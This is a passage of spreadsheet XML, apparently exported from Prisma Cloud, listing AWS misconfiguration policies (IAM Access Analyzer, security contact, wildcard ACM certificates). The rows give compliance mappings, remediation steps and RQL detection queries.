        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1559" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1559" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1559" t="inlineStr">
        <is>
          <t>Control Category: 01.0</t>
        </is>
      </c>
      <c r="R1559" t="inlineStr">
        <is>
          <t>01.v</t>
        </is>
      </c>
      <c r="S1559" t="inlineStr">
        <is>
          <t>kashan</t>
        </is>
      </c>
      <c r="T1559" t="b">
        <v>0</v>
      </c>
      <c r="U1559" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1559" t="inlineStr">
        <is>
          <t>aws-access-analyzer</t>
        </is>
      </c>
      <c r="W1559" t="inlineStr">
        <is>
          <t>This policy identifies AWS regions in which the IAM Access analyzer is not configured. AWS IAM Access Analyzer helps you identify the resources in your organization and accounts, such as Amazon S3 buckets or IAM roles, that are shared with an external entity and identify unintended access to your resources and data. So it is recommended to configure the Access analyzer in all regions in your account.
NOTE: Access Analyzer analyzes only policies that are applied to resources in the same AWS Region that it's enabled in. To monitor all resources in your AWS environment, you must create an analyzer to enable Access Analyzer in each Region where you're using supported AWS resources.
For more details:
https://docs.aws.amazon.com/IAM/latest/UserGuide/what-is-access-analyzer.html</t>
        </is>
      </c>
      <c r="X1559" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated.
3. Navigate to the IAM dashboard 
4. Go to 'Access analyzer', from the left panel
5. Click on the 'Create analyzer' button
6. On the Create analyzer page, enter the parameters as per your requirements.
7. Click on the 'Create analyzer'</t>
        </is>
      </c>
      <c r="Y1559" t="inlineStr"/>
      <c r="Z1559" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-access-analyzer' AND json.rule = status equals ACTIVE as X; config from cloud.resource where api.name = 'aws-region' AND json.rule = optInStatus does not equal not-opted-in as Y; filter '$.X.arn contains $.Y.regionName'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA1559" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB1559" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1559" t="inlineStr"/>
      <c r="AD1559" t="b">
        <v>0</v>
      </c>
      <c r="AE1559" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1559" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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59" t="inlineStr">
        <is>
          <t>46f7c535-2f87-4e1e-8005-a085ee98f6a2</t>
        </is>
      </c>
      <c r="AI1559" t="inlineStr">
        <is>
          <t>924a260d-8f64-4b65-bbae-c3cec8c948ba</t>
        </is>
      </c>
      <c r="AJ1559" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1559" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1560">
      <c r="A1560" t="inlineStr">
        <is>
          <t>PCI DSS v4.0, ISO/IEC 27001:2022, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, CIS v3.0.0 (AWS) Level 1, CIS v1.3.0 (AWS), ISO/IEC 27001:2022, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), wells fargo CIS v1.5.0 (AWS) - Level 1, ISO 27002:2022, CIS v2.0.0 (AWS) - Level 1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v1.5.0 (AWS) - Level 1, HITRUST CSF v.11.2.0, ACSC Information Security Manual (ISM), HITRUST CSF v.11.2.0, Secure Controls Framework (SCF) - 2022.2.1, MTSBv2_AWS, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, MLPS 2.0 (Level 2), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, NIST CSF v2.0, HIPAA, CHC HITRUST CSF v.9.6.0, ISO 27002:2022, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v.9.6.0, PCI DSS v4.0, kfirdaus AWS Account-CS, Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), CHC HITRUST CSF v.9.6.0, CIS v1.4.0 (AWS), PCI DSS v4.0, HITRUST CSF v.9.6.0</t>
        </is>
      </c>
      <c r="B1560" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1560" s="2" t="inlineStr"/>
      <c r="D1560" t="inlineStr"/>
      <c r="E1560" t="inlineStr"/>
      <c r="F1560" t="inlineStr"/>
      <c r="G1560" t="b">
        <v>0</v>
      </c>
      <c r="H15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manulife disabled regions test, mark davis test 412024, pagerduty-test, splunk-test</t>
        </is>
      </c>
      <c r="I1560" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1560" t="inlineStr">
        <is>
          <t>aws-access</t>
        </is>
      </c>
      <c r="K1560" t="inlineStr">
        <is>
          <t>Copy of AWS IAM Access analyzer is not configured</t>
        </is>
      </c>
      <c r="L1560" t="inlineStr"/>
      <c r="M1560" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1560" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1560" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1560" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1560" t="inlineStr">
        <is>
          <t>Control Category: 01.0</t>
        </is>
      </c>
      <c r="R1560" t="inlineStr">
        <is>
          <t>01.v</t>
        </is>
      </c>
      <c r="S1560" t="inlineStr"/>
      <c r="T1560" t="b">
        <v>0</v>
      </c>
      <c r="U1560" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1560" t="inlineStr">
        <is>
          <t>aws-access-analyzer</t>
        </is>
      </c>
      <c r="W1560" t="inlineStr">
        <is>
          <t>This policy identifies AWS regions in which the IAM Access analyzer is not configured. AWS IAM Access Analyzer helps you identify the resources in your organization and accounts, such as Amazon S3 buckets or IAM roles, that are shared with an external entity and identify unintended access to your resources and data. So it is recommended to configure the Access analyzer in all regions in your account.
NOTE: Access Analyzer analyzes only policies that are applied to resources in the same AWS Region that it's enabled in. To monitor all resources in your AWS environment, you must create an analyzer to enable Access Analyzer in each Region where you're using supported AWS resources.
For more details:
https://docs.aws.amazon.com/IAM/latest/UserGuide/what-is-access-analyzer.html</t>
        </is>
      </c>
      <c r="X1560" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated.
3. Navigate to the IAM dashboard 
4. Go to 'Access analyzer', from the left panel
5. Click on the 'Create analyzer' button
6. On the Create analyzer page, enter the parameters as per your requirements.
7. Click on the 'Create analyzer'</t>
        </is>
      </c>
      <c r="Y1560" t="inlineStr"/>
      <c r="Z1560" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-access-analyzer' AND json.rule = status equals ACTIVE as X; config from cloud.resource where api.name = 'aws-region' AND json.rule = optInStatus does not equal not-opted-in as Y; filter '$.X.arn contains $.Y.regionName'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA1560" t="inlineStr">
        <is>
          <t>Mark Davis</t>
        </is>
      </c>
      <c r="AB1560" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1560" t="inlineStr"/>
      <c r="AD1560" t="b">
        <v>0</v>
      </c>
      <c r="AE1560" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1560" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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manulife disabled regions test - Notifications:, AccountGroups:avega-active-directory,Default Account Group,Pramm-XSIAM,Test_Praveen_Webinar2,Juan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60" t="inlineStr">
        <is>
          <t>852c8c3a-af9f-4745-83ac-30b42c028a3f</t>
        </is>
      </c>
      <c r="AI1560" t="inlineStr">
        <is>
          <t>924a260d-8f64-4b65-bbae-c3cec8c948ba</t>
        </is>
      </c>
      <c r="AJ1560" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1560" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1561">
      <c r="A1561" t="inlineStr">
        <is>
          <t>PCI DSS v4.0, ISO/IEC 27001:2022, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, CIS v3.0.0 (AWS) Level 1, Microsoft Cloud Security Benchmark v1, CIS v1.3.0 (AWS), ISO/IEC 27001:2022, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), wells fargo CIS v1.5.0 (AWS) - Level 1, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, CIS v2.0.0 (AWS) - Level 1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v1.5.0 (AWS) - Level 1, HITRUST CSF v.11.2.0, ACSC Information Security Manual (ISM), HITRUST CSF v.11.2.0, Secure Controls Framework (SCF) - 2022.2.1, MTSBv2_AWS, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, MLPS 2.0 (Level 2), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, NIST CSF v2.0, HIPAA, CHC HITRUST CSF v.9.6.0, ISO 27002:2022, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v.9.6.0, PCI DSS v4.0, kfirdaus AWS Account-CS, Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), CHC HITRUST CSF v.9.6.0, CIS v1.4.0 (AWS), PCI DSS v4.0, HITRUST CSF v.9.6.0</t>
        </is>
      </c>
      <c r="B1561" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1561" s="2" t="inlineStr"/>
      <c r="D1561" t="inlineStr"/>
      <c r="E1561" t="inlineStr"/>
      <c r="F1561" t="inlineStr"/>
      <c r="G1561" t="b">
        <v>0</v>
      </c>
      <c r="H15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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1561" t="inlineStr">
        <is>
          <t>aws-access</t>
        </is>
      </c>
      <c r="K1561" t="inlineStr">
        <is>
          <t>AWS IAM Access analyzer is not configured</t>
        </is>
      </c>
      <c r="L1561" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1561" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1561" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1561" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1561" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1561" t="inlineStr">
        <is>
          <t>Control Category: 01.0</t>
        </is>
      </c>
      <c r="R1561" t="inlineStr">
        <is>
          <t>01.c</t>
        </is>
      </c>
      <c r="S1561" t="inlineStr"/>
      <c r="T1561" t="b">
        <v>0</v>
      </c>
      <c r="U1561" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1561" t="inlineStr">
        <is>
          <t>aws-access-analyzer</t>
        </is>
      </c>
      <c r="W1561" t="inlineStr">
        <is>
          <t>This policy identifies AWS regions in which the IAM Access analyzer is not configured. AWS IAM Access Analyzer helps you identify the resources in your organization and accounts, such as Amazon S3 buckets or IAM roles, that are shared with an external entity and identify unintended access to your resources and data. So it is recommended to configure the Access analyzer in all regions in your account.
NOTE: Access Analyzer analyzes only policies that are applied to resources in the same AWS Region that it's enabled in. To monitor all resources in your AWS environment, you must create an analyzer to enable Access Analyzer in each Region where you're using supported AWS resources.
For more details:
https://docs.aws.amazon.com/IAM/latest/UserGuide/what-is-access-analyzer.html</t>
        </is>
      </c>
      <c r="X1561" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated.
3. Navigate to the IAM dashboard 
4. Go to 'Access analyzer', from the left panel
5. Click on the 'Create analyzer' button
6. On the Create analyzer page, enter the parameters as per your requirements.
7. Click on the 'Create analyzer'</t>
        </is>
      </c>
      <c r="Y1561" t="inlineStr"/>
      <c r="Z1561" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-access-analyzer' AND json.rule = status equals ACTIVE as X; config from cloud.resource where api.name = 'aws-region' AND json.rule = optInStatus does not equal not-opted-in as Y; filter '$.X.arn contains $.Y.regionName'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA1561" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1561" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1561" t="inlineStr">
        <is>
          <t>PC-AWS-ACA-858</t>
        </is>
      </c>
      <c r="AD1561" t="b">
        <v>1</v>
      </c>
      <c r="AE1561" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1561" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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1" t="inlineStr">
        <is>
          <t>e50fe75a-d320-483a-88b9-240caf584236</t>
        </is>
      </c>
      <c r="AI1561" t="inlineStr">
        <is>
          <t>924a260d-8f64-4b65-bbae-c3cec8c948ba</t>
        </is>
      </c>
      <c r="AJ1561" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1561" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1562">
      <c r="A1562" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, Microsoft Cloud Security Benchmark v1, CIS v3.0.0 (AWS) Level 1, TX-RAMP Level 1, CIS v2.0.0 (AWS) - Level 1, ISO/IEC 27001:2022, CIS Controls v8.1, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B1562" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1562" s="2" t="inlineStr"/>
      <c r="D1562" t="inlineStr"/>
      <c r="E1562" t="inlineStr"/>
      <c r="F1562" t="inlineStr"/>
      <c r="G1562" t="b">
        <v>1</v>
      </c>
      <c r="H15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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1562" t="inlineStr">
        <is>
          <t>aws-account</t>
        </is>
      </c>
      <c r="K1562" t="inlineStr">
        <is>
          <t>AWS account security contact information is not set</t>
        </is>
      </c>
      <c r="L1562" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1562" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1562" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1562" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1562" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1562" t="inlineStr">
        <is>
          <t>AU</t>
        </is>
      </c>
      <c r="R1562" t="inlineStr">
        <is>
          <t>Response to Audit Logging Process Failures | Real-time Alerts</t>
        </is>
      </c>
      <c r="S1562" t="inlineStr"/>
      <c r="T1562" t="b">
        <v>0</v>
      </c>
      <c r="U1562" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1562" t="inlineStr">
        <is>
          <t>aws-account-management-alternate-contact</t>
        </is>
      </c>
      <c r="W1562" t="inlineStr">
        <is>
          <t>This policy identifies the AWS account which has not set security contact information. Providing dedicated contact information for security specific, AWS can directly communicate security advisories to the team responsible for handling security-related issues. Failure to specify security contact info in AWS risks missing critical advisories, leading to delayed incident response and increased vulnerability exposure. It is recommended to set security contact information to receive notifications.</t>
        </is>
      </c>
      <c r="X1562" t="inlineStr">
        <is>
          <t>Refer to the following link to add or edit the alternate contacts for any AWS account in your organization
https://docs.aws.amazon.com/accounts/latest/reference/manage-acct-update-contact-alternate.html</t>
        </is>
      </c>
      <c r="Y1562" t="inlineStr"/>
      <c r="Z1562" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-account-management-alternate-contact' group by account as X; filter ' AlternateContactType is not member of ("SECURITY") ' ;</t>
        </is>
      </c>
      <c r="AA1562" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1562" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1562" t="inlineStr">
        <is>
          <t>PC-AWS-AAM-1090</t>
        </is>
      </c>
      <c r="AD1562" t="b">
        <v>1</v>
      </c>
      <c r="AE1562" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1562" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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2" t="inlineStr">
        <is>
          <t>0e61ccc7-ed2d-4a49-8424-18e91da1d44a</t>
        </is>
      </c>
      <c r="AI1562" t="inlineStr">
        <is>
          <t>d2977c08-ca5c-4347-83cb-cf05d5c9e147</t>
        </is>
      </c>
      <c r="AJ1562" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1562" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1563">
      <c r="A1563" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO/IEC 27017:2015, TX-RAMP Level 2, APRA (CPS 234) Information Security, ISO 27002:2022, RBI Baseline Cyber Security and Resilience Requirements, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, NIST SP 800-172, Fedramp (Moderate), ISO/IEC 27017:2015, Insurance Regulatory And Development Authority Of India, NIST CSF v2.0, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), APRA (CPS 234) Information Security, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST 800-53 Rev 5, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST SP 800-171 Revision 3, MAS TRM 2021, CIS Controls v8.1, ACSC Information Security Manual (ISM), ISO/IEC 27017:2015, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), NIST CSF, ISO/IEC 27001:2022, CIS Controls v7.1, ISO/IEC 27017:2015, Brazilian Data Protection Law (LGPD), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Sarbanes Oxley Act (SOX), CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, ISO/IEC 27002:2013, Copy of CIS Controls v8, CRI Profile v1.2.1, PCI DSS v3.2.1, ISO/IEC 27002:2013, CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), CSA CCM v4.0.12, ISO/IEC 27017:2015, CRI Profile v2.0, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, SOC 2, ISO/IEC 27001:2022, ISO/IEC 27002:2013, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, ITSG-33, Microsoft Cloud Security Benchmark v1, GDPR, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], NIST 800-53 Rev4, ISO 27002:2022, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, NIST 800-53 Rev 5, HITRUST CSF v.9.6.0, CSA CCM v4.0.12, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ITSG-33, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST SP 800-171 Revision 2, FFIEC, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B1563" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1563" s="2" t="inlineStr"/>
      <c r="D1563" t="inlineStr"/>
      <c r="E1563" t="inlineStr"/>
      <c r="F1563" t="inlineStr"/>
      <c r="G1563" t="b">
        <v>1</v>
      </c>
      <c r="H15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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1563" t="inlineStr">
        <is>
          <t>aws-acm</t>
        </is>
      </c>
      <c r="K1563" t="inlineStr">
        <is>
          <t>AWS ACM Certificate with wildcard domain name</t>
        </is>
      </c>
      <c r="L1563" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1563" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1563" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1563" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1563" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1563" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1563" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S1563" t="inlineStr"/>
      <c r="T1563" t="b">
        <v>0</v>
      </c>
      <c r="U1563" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1563" t="inlineStr">
        <is>
          <t>aws-acm-describe-certificate</t>
        </is>
      </c>
      <c r="W1563" t="inlineStr">
        <is>
          <t>This policy identifies ACM Certificates which are using wildcard certificates for wildcard domain name instead of single domain name certificates. ACM allows you to use an asterisk (*) in the domain name to create an ACM Certificate containing a wildcard name that can protect several sites in the same domain. For example, a wildcard certificate issued for *.prismacloud.io can match both www.prismacloud.io and images.prismacloud.io. When you use wildcard certificates, if the private key of a certificate is compromised, then all domain and subdomains that use the compromised certificate are potentially impacted. So it is recommended to use single domain name certificates instead of wildcard certificates to reduce the associated risks with a compromised domain or subdomain.</t>
        </is>
      </c>
      <c r="X1563" t="inlineStr">
        <is>
          <t>To resolve this alert, you have to replace the reported wildcard certificate with single domain name certificate for all the first-level subdomains resulted from the domain name of the website secured with the wildcard certificate and delete the reported wildcard domain certificate.
To create a new certificate with a single domain:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to Certificate Manager
4. In 'Request a certificate' page,
a. On Step 1: 'Add domain names' page, in the 'Domain name' box, type the fully qualified domain name. Click on 'Next'
b. On Step 2: 'Select validation method' page, Select the validation method. Click on 'Review'
c. On Step 3: 'Review' page, review the domain name and validation method details. click on 'Confirm'
d. On Step 4: 'Validation' page, validate the certificate request based on the validation method selected. then click on 'Continue'
The certificate status should change from 'Pending validation' to 'Issued'. Now access your application's web server configuration and replace the wildcard certificate with the newly issued single domain name certificate.
To delete wildcard certificate:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Go to Certificate Manager(ACM) service
4. Choose the reported certificate
5. Under 'Actions' drop-down click on 'Delete'
6. On 'Delete certificate' popup windows, Click on 'Delete' button</t>
        </is>
      </c>
      <c r="Y1563" t="inlineStr"/>
      <c r="Z1563" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-acm-describe-certificate' AND json.rule = 'domainValidationOptions[*].domainName contains *'</t>
        </is>
      </c>
      <c r="AA1563" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1563" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1563" t="inlineStr">
        <is>
          <t>PC-AWS-ACM-214</t>
        </is>
      </c>
      <c r="AD1563" t="b">
        <v>1</v>
      </c>
      <c r="AE1563" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1563" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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3" t="inlineStr">
        <is>
          <t>4f729fe3-3c9d-4255-81da-ae2f6fe0c34b</t>
        </is>
      </c>
      <c r="AI1563" t="inlineStr">
        <is>
          <t>70cbe31e-4a01-4462-96ea-0d2baeeb8dd8</t>
        </is>
      </c>
      <c r="AJ1563" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1563" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1564">
      <c r="A1564" t="inlineStr">
        <is>
          <t>RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27001:2022, TX-RAMP Level 2, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), PCI DSS v4.0, NIST CSF v2.0, jbrox - GDPR, MLPS 2.0 (Level 2), Telecommunications Security Act - TSA, ISO 27002:2022, Risk Management in Technology (RMiT), Australian Energy Sector Cyber Security Framework (AESCSF), Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, PCI DSS v4.0, MITRE ATT&amp;CK v12, CDC NIST 800-53 Rev4, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, CSA CCM v3.0.1, SOC 2, PCI DSS v3.2.1, CIS Controls v8, GDPR, kfirdaus AWS Account-CS, CIS Controls v7.1, ISO/IEC 27001:2022, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Telecommunications Security Act - TSA, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, PCI DSS v4.0, HITRUST CSF v.9.6.0, Microsoft Cloud Security Benchmark v1, CyberSecurity Law of the People's Republic of China, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, SOC 2, NIST SP 800-172, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 2, CSA CCM v4.0.12, NIST CSF v2.0, DORA, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], CHC HITRUST CSF v.9.6.0, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, HITRUST CSF v.11.2.0, Copy of CIS Controls v8, CSA CCM v4.0.12, CSA CCM v3.0.1, Brazilian Data Protection Law (LGPD), PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), FFIEC, CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, Risk Management in Technology (RMiT), MLPS 2.0, CHC HITRUST CSF v.9.6.0, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CRI Profile v1.2.1, HITRUST CSF v.11.2.0, CSA CCM v4.0.12, NIST 800-53 Rev 5, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CIS Controls v7.1, PCI DSS v4.0, Microsoft Cloud Security Benchmark v1, SOC 2, GDPR, HIPAA, SOC 2, kfirdaus AWS Account-CS, MLPS 2.0 (Level 3), NIST CSF, kashan ACSC Information Security Manual (ISM), Fedramp (Moderate), PCI DSS v4.0, NIST 800-53 Rev4, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, CRI Profile v1.2.1, CSA CCM v.4.0.6, NIST 800-53 Rev 5, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience 